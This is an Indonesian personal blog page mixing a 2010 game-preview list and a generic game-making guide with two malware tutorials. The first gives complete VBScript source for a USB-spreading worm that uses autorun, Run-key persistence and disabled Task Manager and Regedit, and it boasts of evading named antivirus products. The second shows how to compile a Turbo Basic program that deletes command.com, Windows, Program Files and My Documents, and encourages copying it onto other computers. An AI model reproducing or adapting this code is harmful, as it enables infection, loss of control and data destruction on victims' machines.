#navbar-iframe { height:0px; visibility:hidden; display:none }

Halaman

Minggu, 27 Maret 2011

Membuat Virus Sederhana – Notepad



Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode


Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Rabu, 16 Maret 2011

10 Game PC Yang Paling Didambakan Tahun 2010


1. Crysis 2

Crysis 2 is a sequel to crysis, a multiplayer game, and is expected to be released in 2010. Crysis 2 is a science fiction shooting video game which is made in the future probably in 2010 after the a discovery of a spaceship from an island in the south china sea. The crysis runs on the game engine 2, where as the crysis 2 would be the first game to use the game engine 3. There has been no information about the story line of the crysis 2, but according to some brochure the game will be set four years after the events of crysis. The game is expected to be much better than then the crysis.

2. Call of Duty: Black Ops

Black Ops is the seventh installment of Call of Duty sequel and comes in line after much appreciated Modern Warfare 2. According to the developer company, Teryarch, the game will be much better than its predecessor; Modern Warfare 2. Good news for games lovers; Black Ops prestige edition comes with a remote control spy vehicle that is the exact replica of the one you’ll be using in the game. You can see the trailer, release date and buying options here.










3. Splinter Cell Conviction

Clancy’s Splinter Cell Conviction is the fifth sequel to the splinter cell series; the 
game is announced to be released in the first quarter of 2010. The game has
already been delayed several times, it was supposed to be released in July 2009 
but the release date is further moved on to first quarter of 2010.The story unfold
in the real time projected in the environment, Sam has changed a lot and had
became more fast and brutal. The gameis a solo mission where Sam has 
abandoned NSA and now is after the killers of his daughter,at first he thought that 
his daughterdeath was an accident that happened at the beginning of splinter cell 
double agent but soon it turned out that she was killed.


4. Singularity

Singularity is an upcoming science fiction video game to be released in year 2010. 
The game mainly focuses on the mechanics of time manipulation device, it’s a 
technique with the help of which you can move objects through time, you can go 
in the future or the past and you can also use it as a powerful multifunctional 
weapon. The main functions of time manipulation device are Revert, Age, Stasis, 
and Impulse. The game takes place in year 2010 on a mysterious island where 
different scientific experiments are happening.


5. Bios shock 2

BioShock 2 is an upcoming first-person shooter video game the game will release 
in January 2010. The game revolves around the big daddy, a character with super 
speed and intelligence as compared to other big daddies. Game is plotted in the 
year 1970, 10 years after the bioshock, where, there are several notifications 
made about the kidnapping of young girls and the kidnappers are witnessed with 
certain distinct characteristics. One of the single attackers is the big sister who is 
kidnapping young girls and turns them in to creatures like her.


6. Mass Effect 2

Mass effect 2 is a stunning sci-fi role playing game which is announced to be 
released in the firstmonth of 2010. Mass effect take place 2 year after the mass
effect and the choice that player made in the mass effectwould carry over into 
the mass effect 2. The game will feature new alienspecies which are supposed 
be the best assassin in the galaxy.











There are huge changes made to the weapons, The Commander Shepard has been 
upgraded with new cool heavy weaponry guided missiles and new and smooth 
combat techniques. The game design has been upgraded, besides several new 
planetary exploration vehicles are added.


7. Dark Void

Dark void is a Sci-fi action adventure game the game revolves around a cargo 
pilot name William Augustus Grey who crashes in the mystic Bermuda triangle 
from there he is teleported to other parallel universe where he encounters other 
human survivors. William and the other survivors must battle with an alien race 
know as watcher to return to the Earth.


8. Command & Conquer 4 Tiberian twilight

Command and conquer is one of the best real time strategy game, the command 
and conquer 4 is announced to be released in 2010; some trailer have already 
been released in July 2009. Thecommand and conquer 4 is considered to be an 
online game whether you are playing the single mission or the skirmishes, EA is 
thinking about the offline game mode too.Like the previous command and 
conquer the player is required to construct his own base, create an army, 
continuously funding the base and attacking the opponents base. It is said that 
the game is different then the previous command and conquer.


9. Fifa 2010

Fifa 10 in the upcoming release of football video game. The game release has 
been delayed several times. Each regional version of the fifa will display 
different players on the cover; there are 30 leagues and over500 teams in fifa
10, as well as 41 national teams. New FIFA 10 is the Russian Premier League, 
which has so far only been officially confirmed for the PC version.


















10. Star Craft II
Star craft 2, also know as Wings of liberty is a military science fiction strategy 
game. The gameis announced to be released in first half of year 2010. Set In the 
26th century in the distant part of Milky Way galaxy, the game moves around 
the three species named Terran, Protoss, Zerg. The game mainly focuses on the 
Terran, the game is plotted for the year after the star craft. The star craft is 
designed for ultimate competitive strategy. Like star craft the star craft 2 is 
heavily designed for multiplayer. In star craft 2 some additional functions have
been added like, the replay function, which allows players to record and review 
past games.


Cara membuat program perusak (Seperti Virus)


Download Turbo Basic v1.0

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.


Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.


Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"


Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?


Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.


Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe


Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Penulis :
Yogya Family Code



*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

CARA MEMBUAT GAME ONLINE

Online game dan permainan masyarakat tumbuh, dan banyak orang yang ingin untuk membuat dan berbagi game yang mereka buat sendiri. Ada dua cara untuk menyelesaikan tugas ini. Melibatkan pertama belajar bahasa komputer atau bahasa dan mengambil kelas atau kelas untuk benar-benar memahami setiap dinamika dan langkah yang masuk ke dalam membuat permainan Anda dapat berbagi secara online. Tapi bagi kebanyakan orang, bahwa membutuhkan banyak waktu dan uang mereka tidak punya. Jadi, di sini adalah cara kedua untuk membuat permainan.

1. Pikirkan tentang apa yang orang-orang yang harus untuk bermain. Luangkan waktu untuk menjelajah melalui beberapa komunitas game online untuk ide-ide sebelum memutuskan permainan untuk membuat.

2. Penelitian, membandingkan dan memilih katalis untuk pembuatan game online melalui internet Ada banyak tutorial gratis dan beberapa teknologi canggih yang tersedia bagi publik untuk men-download untuk sejumlah kecil biaya moderat. Menemukan yang tepat sangat penting bila Anda ingin permainan online Anda mematikan tepat.

3. Menggambar dan menulis apa permainan Anda adalah tentang. Apakah akan ada karakter? Apakah mereka memiliki kekuasaan? Apa Tujuan permainan? Apakah akan ada berbagai tingkat? Ini dan lebih banyak pertanyaan harus dijawab, dipikirkan dan ditulis untuk membuat permainan online Anda lebih mudah untuk membuat.

4. Mengikuti petunjuk melalui katalis Anda telah memilih untuk menggunakan, mulai membuat game online Anda. Langkah pertama dalam aplikasi itu sendiri biasanya latar belakang dan bangunan blok. Langkah-langkah mendapatkan lebih rinci saat Anda pergi.

5. Mainkan permainan sendiri beberapa kali untuk memastikan semuanya berjalan dengan cara yang Anda impikan itu bekerja. Anda tidak ingin mempublikasikan sesuatu online atau coba untuk menjualnya melalui internet hanya untuk mengetahui ada beberapa Kinks yang belum diperbaiki.

6. Cari situs web atau perusahaan di mana Anda merasa permainan anda akan mendapatkan yang paling perhatian. Anda memiliki beberapa pilihan dalam langkah ini. Anda dapat mempublikasikan permainan dan memungkinkan pengguna online untuk bermain secara gratis. Anda dapat mempublikasikan versi mini game online Anda dan menawarkan pengguna untuk membeli atau anda dapat mencoba dan menjual permainan Anda ke sebuah perusahaan dan membiarkan mereka mengurus sisanya.

Petunjuk:

Meskipun Anda mungkin memiliki ide yang sangat baik untuk permainan, lakukan penelitian untuk memastikan hal itu akan berhasil, terutama jika anda berencana untuk membuat uang dari itu.

TUJUAN PEMBUATAN BLOG INI

Tujuan kami membuat blog ini untuk mempromosikan dan memberitahu apa yang kami ketahui. Serta membantu anda untuk mengetahui sesuatu hal yang belum anda ketahui.
Semoga dengan adanya blog ini dapat membantu anda yang sedang membutuhkan sesuatu.

Terima Kasih